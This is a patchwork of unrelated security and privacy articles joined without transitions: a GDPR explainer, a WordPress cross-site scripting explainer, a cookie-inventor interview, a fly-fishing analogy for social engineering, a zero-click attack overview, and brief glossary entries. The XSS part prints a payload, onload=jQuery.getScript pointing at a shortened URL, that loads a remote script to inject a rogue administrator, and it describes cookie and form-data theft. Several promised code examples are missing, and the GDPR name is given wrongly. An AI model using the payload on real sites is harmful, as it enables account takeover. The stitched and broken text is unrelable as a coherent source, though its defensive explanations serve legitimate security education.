GDPR stands for General Data Protection Legislation. It is a European Union (EU) law that came into effect on 25th May 2018. GDPR governs the way in which we can use, process, and store personal data (information about an identifiable, living person). It applies to all organisations within the EU, as well as those supplying goods or services to the EU or monitoring EU citizens. Therefore it is essential for businesses and organisations to understand explicitly what GDPR means. It is the legislative force established to protect the fundamental rights of data subjects whose personal information and sensitive data is stored in organisations. Data subjects will now have the right to demand subject access to their personal information, and the right to demand that an organisation destroys their personal information. These regulations will affect most sectors within business, from marketing to health services. Therefore, to avoid the crippling fines administered by the Information Commissioner’s Office (ICO) it is essential to become GDPR compliant.
GDPR Key Principles:
Lawfulness, transparency and fairness
Only using data for the specific lawful purpose that it was obtained, the most lenient of which is legitimate interests
Only acquiring data that we strictly need
Ensuring any data we possess is accurate
Integrity and confidentiality
Why Is GDPR Important?
Primarily GDPR is important since it provides a single set of rules for all EU organisations s to adhere to, thus giving businesses a level playing field and making the transfer of data between EU countries quicker and more transparent. It also empowers EU citizens by giving them more control over the ways in which their personal data is used. Prior to introducing the new GDPR legislations, the European commission found that a mere 15% of citizens felt that they had complete control over the information that they provided online. With such low trust amongst the general public it is clear that consumer habits will ultimately be affected. Measures to rebuild this confidence, through introduction and proper implementation of GDPR, are expected to increase trade. Thorough implementation of data protection policies and staff education are important as non-compliance could result in a data breach. The Information Commissioner’s Office (ICO) can issue fines of up to 4% of your annual turnover or €20 million, whichever is greater, in the event of a serious data breach. Data protection training is a necessity in mitigating the risk of data breaches.
Vulnerabilities are a fact of life for anyone managing a website, even when using a well-established content management system like WordPress. Not all vulnerabilities are equal, with some allowing access to sensitive data that would normally be hidden from public view, while others could allow a malicious actor to take full control of an affected website. There are many types of vulnerabilities, including broken access control, misconfiguration, data integrity failures, and injection, among others. One type of injection vulnerability that is often underestimated, but can provide a wide range of threats to a website, is Cross-Site Scripting, also known as “XSS”. In a single 30-day period, Wordfence blocked a total of 31,153,743 XSS exploit attempts, making this one of the most common attack types we see.
What is Cross-Site Scripting?
Without breaking XSS down into its various uses, there are three primary categories of XSS that each have different aspects that could be valuable to a malicious actor. The types of XSS are split into stored, reflected, and DOM-based XSS. Stored XSS also includes a sub-type known as blind XSS.
Stored Cross-Site Scripting could be considered the most nefarious type of XSS. These vulnerabilities allow exploits to be stored on the affected server. This could be in a comment, review, forum, or other element that keeps the content stored in a database or file either long-term or permanently. Any time a victim visits a location the script is rendered, the stored exploit will be executed in their browser.
Blind Cross-Site Scripting is a sub-type of stored XSS that is not rendered in a public location. As it is still stored on the server, this category is not considered a separate type of XSS itself. In an attack utilizing blind XSS, the malicious actor will need to submit their exploit to a location that would be accessed by a back-end user, such as a site administrator. One example would be a feedback form that submits feedback to the administrator regarding site features. When the administrator logs in to the website’s admin panel, and accesses the feedback, the exploit will run in the administrator’s browser.
Reflected Cross-Site Scripting is a more interactive form of XSS. This type of XSS executes immediately and requires tricking the victim into submitting the malicious payload themselves, often by clicking on a crafted link or visiting an attacker-controlled form. The exploits for reflected XSS vulnerabilities often use arguments added to a URL, search results, and error messages to return data back in the browser, or send data to a malicious actor. Essentially, the threat actor crafts a URL or form field entry to inject their malicious code, and the website will incorporate that code in the submission process for the vulnerable function. Attacks utilizing reflected XSS may require an email or message containing a specially crafted link to be opened by an administrator or other site user in order to obtain the desired result from the exploit. This XSS type generally involves some degree of social engineering in order to be successful and it’s worth noting that the payload is never stored on the server so the chance of success relies on the initial interaction with the user.
In January of 2022, the Wordfence team discovered a reflected XSS vulnerability in the Profile Builder – User Profile & User Registration Forms plugin. The vulnerability allowed for simple page modification, simply by specifically crafting a URL for the site. Here we generated an alert using the site_url parameter and updated the page text to read “404 Page Not Found” as this is a common error message that will not likely cause alarm but could entice a victim to click on the redirect link that will trigger the pop-up.
DOM-Based Cross-Site Scripting is similar to reflected XSS, with the defining difference being that the modifications are made entirely in the DOM environment. Essentially, an attack using DOM-based XSS does not require any action to be taken on the server, only in the victim’s browser. While the HTTP response from the server remains unchanged, a DOM-based XSS vulnerability can still allow a malicious actor to redirect a visitor to a site under their control, or even collect sensitive data.
How Does Cross-Site Scripting Impact WordPress Sites?
WordPress websites can have a number of repercussions from Cross-Site Scripting (XSS) vulnerabilities. Because WordPress websites are dynamically generated on page load, content is updated and stored within a database. This can make it easier for a malicious actor to exploit a stored or blind XSS vulnerability on the website which means an attacker often does not need to rely on social engineering a victim in order for their XSS payload to execute.
Using Cross-Site Scripting to Manipulate Websites
One of the most well-known ways that XSS affects WordPress websites is by manipulating the page content. This can be used to generate popups, inject spam, or even redirect a visitor to another website entirely. This use of XSS provides malicious actors with the ability to make visitors lose faith in a website, view ads or other content that would otherwise not be seen on the website, or even convince a visitor that they are interacting with the intended website despite being redirected to a look-alike domain or similar website that is under the control of of the malicious actor.
When testing for XSS vulnerabilities, security researchers often use a simple method such as alert()prompt() or print() in order to test if the browser will execute the method and display the information contained in the payload. This typically looks like the following and generally causes little to no harm to the impacted website:
This method can also be used to prompt a visitor to provide sensitive information, or interact with the page in ways that would normally not be intended and could lead to damage to the website or stolen information.
Stealing Data With Cross-Site Scripting
XSS is one of the easier vulnerabilities a malicious actor can exploit in order to steal data from a website. Specially crafted URLs can be sent to administrators or other site users to add elements to the page that send form data to the malicious actor as well as, or instead of, the intended location of the data being submitted on the website under normal conditions.
If this form of data theft is used on a vulnerable login page, a threat actor could easily gain access to usernames and passwords that could be used in later attacks. These attacks could be against the same website, or used in credential stuffing attacks against a variety of websites such as email services and financial institutions.
Taking Advantage of Cross-Site Scripting to Take Over Accounts
Perhaps one of the most dangerous types of attacks that are possible through XSS vulnerabilities is an account takeover. This can be accomplished through a variety of methods, including the use of stolen cookies, similar to the example above. In addition to simply using cookies to access an administrator account, malicious actors will often create fake administrator accounts under their control, and may even inject backdoors into the website. Backdoors then give the malicious actor the ability to perform further actions at a later time.
If a XSS vulnerability exists on a site, injecting a malicious administrator user can be light work for a threat actor if they can get an administrator of a vulnerable website to click a link that includes an encoded payload, or if another stored XSS vulnerability can be exploited. In this example we injected the admin user by pulling the malicious code from a web-accessible location, using a common URL shortener to further hide the true location of the malicious location. That link can then be utilized in a specially crafted URL, or injected into a vulnerable form with something like onload=jQuery.getScript('https://bit.ly/<short_code>'); to load the script that injects a malicious admin user when the page loads.
Tools Make Light Work of Exploits
There are tools available that make it easy to exploit vulnerabilities like Cross-Site Scripting (XSS). Some tools are created by malicious actors for malicious actors, while others are created by cybersecurity professionals for the purpose of testing for vulnerabilities in order to prevent the possibility of an attack. No matter what the purpose of the tool is, if it works malicious actors will use it. One such tool is a freely available penetration testing tool called BeEF. This tool is designed to work with a browser to find client-side vulnerabilities in a web app. This tool is great for administrators, as it allows them to easily test their own webapps for XSS and other client-side vulnerabilities that may be present. The flip side of this is that it can also be used by threat actors looking for potential attack targets.
One thing that is consistent in all of these exploits is the use of requests to manipulate the website. These requests can be logged, and used to block malicious actions based on the request parameters and the strings contained within the request. The one exception is that DOM-based XSS cannot be logged on the web server as these are processed entirely within the victim’s browser. The request parameters that malicious actors typically use in their requests are often common fields, such as the WordPress search parameter of $_GET[‘s’] and are often just guesswork hoping to find a common parameter with an exploitable vulnerability. The most common request parameter we have seen threat actors attempting to attack recently is $_GET[‘url’] which is typically used to identify the domain name of the server the website is loaded from.
One of the best ways to protect your website against XSS vulnerabilities is to keep WordPress and all of your plugins updated. Sometimes attackers target a zero-day vulnerability, and a patch is not available immediately, which is why the Wordfence firewall comes with built-in XSS protection to protect all Wordfence users.
We asked the engineer who invented cookies what they mean and how to handle them.
YOU ARE NOT the only person irritated by those pesky cookie permissions boxes. If you click “Accept” by rote, you have no idea what you’re agreeing to. Or perhaps you don’t care? Many users think they have to accept all cookies to access the website, but that’s not always the case. Another option is to manage your cookies, but what does that even mean?
To find out, we spoke to Lou Montulli, the engineer who invented cookies at age 23.
“I’m just like everybody else,” says Montulli. “I want that pop-up to go away as soon as possible. The idea of asking people about permissions every single time they go to a website is annoying.”
Every website you visit places cookies on your browser. The purpose of the cookie is to allow a website to recognize a browser. That’s why you can return to a site and be recognized, even if you don’t always log in. It’s why the stuff in your shopping cart is still there the next day, or that article remembers where you stopped reading. You don’t have to “introduce” yourself every time you visit a site, but is the convenience worth it?
With Montulli’s help, here are some of the most frequently used terms those annoying permissions boxes are asking you about, and what you might want to choose when you see them.
First, let’s explain what some of the types of cookies you’ll see really do:
Session Cookies are temporary. These aren’t saved when you quit your browser.
Persistent Cookies will stay on your hard drive until you delete them, or your browser does. These have an expiration date written into their code. That expiration date varies depending on the site or service that issued them and is chosen by the website that places them on your browser.
First-Party Cookies are those placed directly onto your device by the website you’re visiting.
Third-Party Cookies are placed on your device but not by the website you’re on, aka the first party. Instead, they’re put onto your device by advertisers, data partners, or any analytics tools that track visitors (usually at the request of that first party. Think Google Analytics for your favorite tech magazine website, for example.)
Strictly Necessary Cookies allow you to view a website’s content and use its features.
Preference Cookies, aka Functionality Cookies, allow a website to remember data you typed: for example, your user ID, password, delivery address, email, phone, and preferred method of payment.
Statistics Cookies, aka Performance Cookies, record how you used a website. Although these see links clicked and pages visited, your identity is not attached to these stats. These can include cookies from a third party. So if a website uses an analytics system from a third party to track what visitors do on that first-party website, it only divulges that tracking info to the website that hired the third party for analytics.
What Am I Supposed to Choose? Does It Matter?
Montulli refers to the pop-up permissions box as “a really silly idea.” His preference would be a much more efficient and technical solution. For example, a user could choose their cookie preferences once in their browser, and every website they visit would honor that choice, similar to the design of Do Not Track. Montulli explained it like this: “Say I want to accept one type of cookie, but not that other cookie, or those cookies, any website could just ask the browser once what any user’s preferences are.” One and done.
That would be better, but what happens when you click “Accept All”—aside from thoughts like, Why does every website keep asking me these questions?
What many people (especially Americans) may not know is that in 2018, the European Union (EU) passed the General Data Protection Regulation (GDPR). And even if they have heard of it, they may not know enough to understand that this law is partially why cookie permission boxes are becoming more prevalent.
As part of GDPR, companies based outside Europe can be hit with enormous fines if they track and analyze EU visitors to their website. In other words, say your company resides in New York, but that company has European visitors and customers, or collects their data. If that’s the case, they can be penalized to the tune of tens of millions in fines if they don’t disclose their data collection and obtain the user’s consent.
Understandably, American companies want to avoid huge fines, which is why US users are seeing more and more of these permission boxes.
The boxes are designed to offer users more control over their data, as the EU law was put into place to protect all data belonging to EU citizens and residents. The confusion within the US market exists because the country doesn’t have similar laws to protect the privacy of its citizens.
In February 2022, Saryu Nayyar wrote a piece for Forbes that asks if it’s time for a US version of GDPR. Nayyar wrote that the point of such a law would be “gaining explicit consent for collecting data and deleting data if consent is withdrawn.” That sounds like an awesome idea, but after consulting Montulli, the privacy plot thickens.
Personally, I find it impossible to separate cookies and privacy online. I asked Montulli if it’s true that everything on the internet stays on the internet.
“No,” he says. That’s because information on the internet is detached from your current online presence. The purpose of the cookie is to allow a website to know when the same browser returns. The cookie may contain additional pieces of information. “But the predominant use of it is to pass an ID to your browser as an identifier,” he says.
“Why push on a locked door when there’s an open window?”
As any seasoned fly angler knows, trout are highly selective, continuous feeders with their entire survival strategy centered on conserving energy, remaining close to a safe holding place, and gaining maximum protein intake with minimal movement. To fool the wily trout, fly angler have developed a practice of “matching the hatch” is used by fly anglers to present an artificial fly that most resembles what the trout are currently feeding on and getting it close to where a feeding trout is holding. And often, with the right presentation, the trout is fooled and hooked.
So what does fly fishing have to do with cyber security?
In many ways, cyber criminals behave exactly like seasoned fly anglers. Rarely do they waste time, energy and resources bombarding a company’s firewall. Or in the case of fly fishing, randomly cast using any fly pattern available. And as cybercrime becomes more sophisticated and controlled by criminal gangs and nation states, they favor a targeted approach. Cybercriminals today look for the easiest and quickest way through a company’s security defenses, often focusing on individual employees using an approach called social engineering.
Cybercriminals, like fly anglers, look for the easiest way to fool their target. And in today’s disrupted business world that seems to be employees working from home, where in most cases the home environment is far less secure than the office IT environment. They also, like a fly angler matching the hatch, impersonate senior executives demanding a lower-level employee (for example from the finance department) wire money immediately to an (fake) client account. All too often the employee, when receiving an urgent email from a named senior executive, complies.
The savvy trout angler spends a great deal of time understanding the trout species they are targeting, the river environment, the types of insect life and potential food sources, most active feeding times etc. They even visit nearby fly shops and talk with knowledgeable fishing guides for specific information. They build a knowledge base used to match the hatch and fool the trout.
In a similar way, a cybercriminal spends a great amount of time researching the company they are targeting. They scour LinkedIn profiles, search company websites for the names and titles of employees, gather information about employees on Facebook, Tinder, Instagram, Snapchat and other social media platforms. Recently they have begun to telephone employees at home pretending to be a legitimate research company, even offering cash for answering survey questions. In many cases, employee emails and other confidential information can be purchased from other criminal groups on the Dark Net. Using all this information they put together a list of potential employees to target with Phishing emails and social engineering.
Trout anglers know that older and larger trout are more “educated” in spotting real food from an anglers imitation. Older trout have probably seen numerous presentations from lots of different anglers and learned to be wary and highly selective. Also, the clearer the water, the more wary the trout are in general to protect themselves from predators. Smaller, younger trout have yet to learn and are easier to fool.
Cybercriminals know that new employees are easier to fool as well. This is especially true when cyber security training is minimal and there is little peer to peer education about what to watch out for when it comes to email phishing and social engineering. And working from home has in most cases reduced the amount of team learning and peer to peer interactions, which provide a safe place for new employees to ask questions and seek advice. In many training classes few employees want to be singled out for asking “naïve” questions.
A Human Approach to Mitigating Cybercrime
To blunt the growing impact of cybercrime, companies need to focus more on the human aspect of cyber security. In most organizations, 98% of the cyber security budget is spent on technology and less than 2% on employees. Yet 88% of cyber breaches are the result of human error, poor cyber hygiene, mismanagement, and insider actions. Just 12% of breaches are due to technology failures. And 61% of cyber victims fail to report the incident.
The analogy between fly fishing and cybercrime offers many opportunities for companies to improve their cyber security. For example, clarity of water in a trout stream is easily equated with open transparency and cross-functional communications in the corporate world. Learning from others, on-going communications about attempted cyberattacks and successful breaches allows everyone to learn quickly and become more aware and accountable. Having the IT department help secure the home technology and internet environment of senior executives, Board Directors and other high value targets helps prevent breaches and high-value-employee data mining by cyber criminals. Adding additional support for the cyber security and IT team to improve and keep on top of cyber hygiene, patches and software upgrades can go a long way in mitigating cyber risks.
Cyber security is the number one threat to businesses and organizations everywhere. Between 2020 and 2021, ransomware attacks increased by 60%, with the average ransomware payment approaching $4.5 million (IBM). And that’s just the payment to the hackers. The cost of downtime, lost revenue, reputational damage and decline in market value is nearly 10 times the ransom payment.
It is past time senior leaders prioritize the human firewall. Otherwise cybercrime will continue to grow and pose an ever growing threat to our global economy and way of life.
Zero-click attacks, especially when combined with zero-day vulnerabilities, are difficult to detect and becoming more common.
Zero-click attack definition
Zero-click attacks, unlike most cyberattacks, don’t require any interaction from the users they target, such as clicking on a link, enabling macros, or launching an executable. They are sophisticated, often used in cyberespionage campaigns, and tend to leave very few traces behind—which makes them dangerous.
Once a device is compromised, an attacker can choose to install surveillance software, or they can choose to enact a much more destructive strategy by encrypting the files and holding them for ransom. Generally, a victim can’t tell when and how they’ve been infected through a zero-click attack, which means users can do little to protect themselves.
How zero-click attacks work
Zero-click attacks have become increasingly popular in recent years, fueled by the rapidly growing surveillance industry. One of the most popular spyware is NSO Group’s Pegasus, which has been used to monitor journalists, activists, world leaders, and company executives. While it’s not clear how each victim was targeted, it is believed that at least a few of them have received a WhatsApp call they didn’t even have to answer.
Messaging apps are often targeted in zero-click attacks because they receive large amounts of data from unknown sources without requiring any action from the device owner. Most often, the attackers exploit a flaw in how data is validated or processed.
Other less-known zero-click attack types have stayed under the radar, says Aamir Lakhani, cybersecurity researcher at Fortinet’s FortiGuard Labs. He gives two examples: parser application exploits (“while a user views a picture in a PDF or a mail application, the attacker is silently exploiting a system without user clicks or interaction needed”) and “WiFi proximity attacks that seek to find exploits on a WiFi stack and upload exploit code into [the] user’s space [in the] kernel to remotely take over systems.”
Zero-click attacks often rely on zero-days, vulnerabilities that are unknown to the software maker. Not knowing they exist, the maker can’t issue patches to fix them, which can put users at risk. “Even very alert and aware users cannot avoid those double-whammy zero-day and zero-click attacks,” Lakhani says.
These attacks are often used against high-value targets because they are expensive. “Zerodium, which purchases vulnerabilities on the open market, pays up to $2.5M for zero-click vulnerabilities against Android,” says Ryan Olson, vice president of threat intelligence, Unit 42 at Palo Alto Networks.
Examples of zero-click attacks
The target of a zero-click attack can be anything from a smartphone to a desktop computer and even an IoT device. One of the first defining moments in their history happened in 2010 when security researcher Chris Paget demonstrated at DEFCON18 how to intercept phone calls and text messages using a Global System for Mobile Communications (GSM) vulnerability, explaining that the GSM protocol is broken by design. During his demo, he showed how easy it was for his international mobile subscriber identity (IMSI) catcher to intercept the mobile phone traffic of the audience.
Another early zero-click threat was discovered in 2015 when the Android malware family Shedun took advantage of the Android Accessibility Service’s legitimate functions to install adware without the user doing anything. “By gaining the permission to use the accessibility service, Shedun is able to read the text that appears on screen, determine if an application installation prompt is shown, scroll through the permission list, and finally, press the install button without any physical interaction from the user,” according to Lookout.
A year later, in 2016, things got even more complicated. A zero-click attack was implemented into the United Arab Emirates surveillance tool Karma, which took advantage of a zero-day found in iMessage. Karma only needed a user’s phone number or email address. Then, a text message was sent to the victim, who didn’t even have to click on a link to be infected.
Once that text arrived on an iPhone, the attackers were able to see photos, emails, and location data, among other items. The hacking unit that used this tool, dubbed Project Raven, included U.S. intelligence hackers who helped the United Arab Emirates monitor governments and human rights activists.
By the end of that decade, zero-click attacks were being noticed more often, as surveillance companies and nation-state actors started to develop tools that didn’t require any action from the user. “Attacks that we were previously seeing through links in SMS, moved to zero-click attacks by network injections,” says Etienne Maynier, technologist at Amnesty International.
Amnesty and the Citizen Lab worked on several cases involving NSO Group’s Pegasus spyware, which was linked to several murders, including that of the Washington Post journalist Jamal Khashoggi. Once installed on a phone, Pegasus can read text messages, track calls, monitor a victim’s location, access the device’s mic and camera, collect passwords, and gather information from apps.
Khashoggi and his close ones were not the only victims. In 2019, a flaw in WhatsApp was exploited to target civil society and political figures in Catalonia. The attack started with a video call made on WhatsApp to the victim. Answering the call wasn’t necessary, as the data sent to the chat app wasn’t sanitized properly. This allowed the Pegasus code to be executed on the target device, effectively installing the spyware software. WhatsApp has since patched this vulnerability and has notified 1,400 users who have been targeted.
Another sophisticated zero-click attack associated with NSO Group’s Pegasus was based on a vulnerability in Apple’s iMessage. In 2021, Citizen Lab found traces of this exploit being used to target a Saudi activist. This attack relies on an error in the way GIFs are parsed in iMessage and disguises a PDF document containing malicious code as a GIF. In its analysis of the exploit, Google Project Zero stated, “The most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox.” The iMessage vulnerability was fixed on September 13, 2021, in iOS 14.8.
Zero-click attacks don’t only target phones. In 2021, a zero-click vulnerability gave unauthenticated attackers full control over Hikvision security cameras. Later the same year, a flaw in Microsoft Teams was proved to be exploitable through a zero-click attack that gave hackers access to the target device across major operating systems (Windows, MacOS, Linux).
How to detect and mitigate zero-click attacks
Realistically, knowing if a victim is infected is quite tricky, and protecting against a zero-click attack is almost impossible. “Zero-click attacks are way more common than we thought,” says Maynier. He recommends potential targets encrypt all their data, update their devices, have strong passwords, and do everything in their power to protect their digital lives. There’s also something else he tells them: “Consider that they may be compromised and adapt to that.”
Still, users can do a few things to minimize the risk of being spied on. The simplest one is to restart the phone periodically if they own an iPhone. Experts at Amnesty have shown that this could potentially stop Pegasus from working on iOS—at least temporarily. This has the advantage of disabling any code running that has not achieved persistence. However, the disadvantage is that rebooting the device may erase the signs that an infection has occurred, making it much harder for security researchers to determine whether a device has been targeted with Pegasus.
Users should also avoid jailbreaking their devices, because it removes some of the security controls that are built into the firmware. In addition to that, since they can install unverified software on a jailbroken device, this opens them up to installing vulnerable code that might be a prime target for a zero-click attack.
As always, maintaining good security hygiene can help. “Segmentation of networks, applications, and users, use of multifactor authentication, use of strong traffic monitoring, good cybersecurity hygiene, and advanced security analytics may prove to slow down or mitigate risks in specific situations,” says Lakhani. “[These] will also make post-exploitation activities difficult for attackers, even if they do compromise [the] systems.”
Maynier adds that high-profile targets should segregate data and have a device only for sensitive communications. He recommends users keep “the smallest amount of information possible on their phone (disappearing messages are a very good tool for that)” and leave it out of the room when they have important face-to-face conversations.
Organizations such as Amnesty and Citizen Lab have published guides instructing users to connect their smartphone to a PC and check to see whether they have been infected with Pegasus. The software used for this, Mobile Verification Toolkit, relies on known Indicators of Compromise such as cached favicons and URLs present in SMS messages. A user does not have to jailbreak their device to run this tool.
Also, Apple and WhatsApp have both sent messages to people who might have been targeted by zero-click attacks that aimed to install Pegasus. After that, some of them reached out to organizations such as Citizen Lab to further analyze their devices.
Yet technology alone won’t solve the problem, says Amnesty’s Maynier. “This is ultimately a question of policy and regulation,” he adds. “Amnesty, EDRi and many other organizations are calling for a global moratorium on the use, sale, and transfer of surveillance technology until there is a proper human rights regulatory framework in place that protects human rights defenders and civil society from the misuse of these tools.”
The policy answers will have to cover different aspects of this problem, he says, from export control to mandatory human rights due diligence for companies. “We need to put a stop on these widespread abuses first,” Maynier adds.
A hacking technique where login credentials are obtained (often stolen) from one site and used to attempt to log into one or more other services – typically higher value sites like banks, credit cards, etc.
This is why we recommend that you never re-use passwords.
The video below gives a pretty clear explanation of the problem, and offers some ways around it (password managers, multi-factor authentication, passwordless login). We’ll be covering passwordless login soon…
Ransomware is a form of malware that encrypts a victim’s files. The attacker then demands a ransom from the victim to restore access to the data upon payment.
Users are shown instructions for how to pay a fee to get the decryption key. The costs can range from a few hundred dollars to thousands, typically payable to cybercriminals in hard to trace cryptocurrency such as Bitcoin.
A “consent phishing” scam is an attempt by adversaries to get employees to install a malicious application and/or grant it permissions that will allow it to access sensitive data or perform unwanted functions.
This type of consent phishing relies on the OAuth 2.0 authorization technology. By implementing the OAuth protocol into an app or website, a developer gives a user the ability to grant permission to certain data without having to enter their password or other credentials.
Used by a variety of online companies including Microsoft, Google, and Facebook, OAuth is a way to try to simplify the login and authorization process for apps and websites through a single sign-on mechanism. However, as with many technologies, OAuth can be used for both beneficial and malicious purposes.
Microsoft details the problem step by step in its blog post:
An attacker registers an app with an OAuth 2.0 provider.
The app is configured in a way that makes it seem trustworthy, such as using the name of a popular product used in the same ecosystem.
The attacker gets a link in front of users, which may be done through conventional email-based phishing, by compromising a non-malicious website, or through other techniques.
The user clicks the link and is shown an authentic consent prompt asking them to grant the malicious app permissions to data.
If a user clicks Accept, they grant the app permissions to access sensitive data.
The app gets an authorization code, which it redeems for an access token, and potentially a refresh token.
The access token is used to make API calls on behalf of the user.
The attacker can then gain access to the user’s mail, forwarding rules, files, contacts, notes, profile, and other sensitive data.
“Part of the problem is that most users don’t understand what is happening,” Roger Grimes, data driven defense evangelist at KnowBe4 said. “They don’t know that a sign-on that they’ve used with Gmail, Facebook, Twitter or some other OAuth provider is now automatically being called and used or abused by another person. They don’t understand the permission prompts either. All they know is they clicked on an email link or an attachment and now their computer system is asking them to confirm some action that they really don’t understand.”
Fleeceware: Apps which are marketed as “free”, but which then trick the user into subscribing for paid services (which are available free elsewhere), often for excessive fees.
Common examples are horoscope apps, QR code or barcode scanners, and face filter apps targeted at younger users. Publishers of fleeceware target users who may be less cognizant or sensitive to initial fees and reoccurring charges.
Often users are hooked in by free trials, which turn out to be difficult to extricate yourself from after the “free” period has lapsed.
These are currently most common on phone apps (both iPhone and Android), but the same techniques can be found with some desktop applications as well.
Watering-hole campaigns make use of malicious websites that lure visitors in with targeted content – cyberattackers often post links to that content on discussion boards and on social media to cast a wide net. When visitors click through to a malicious website, background code will then infect them with malware.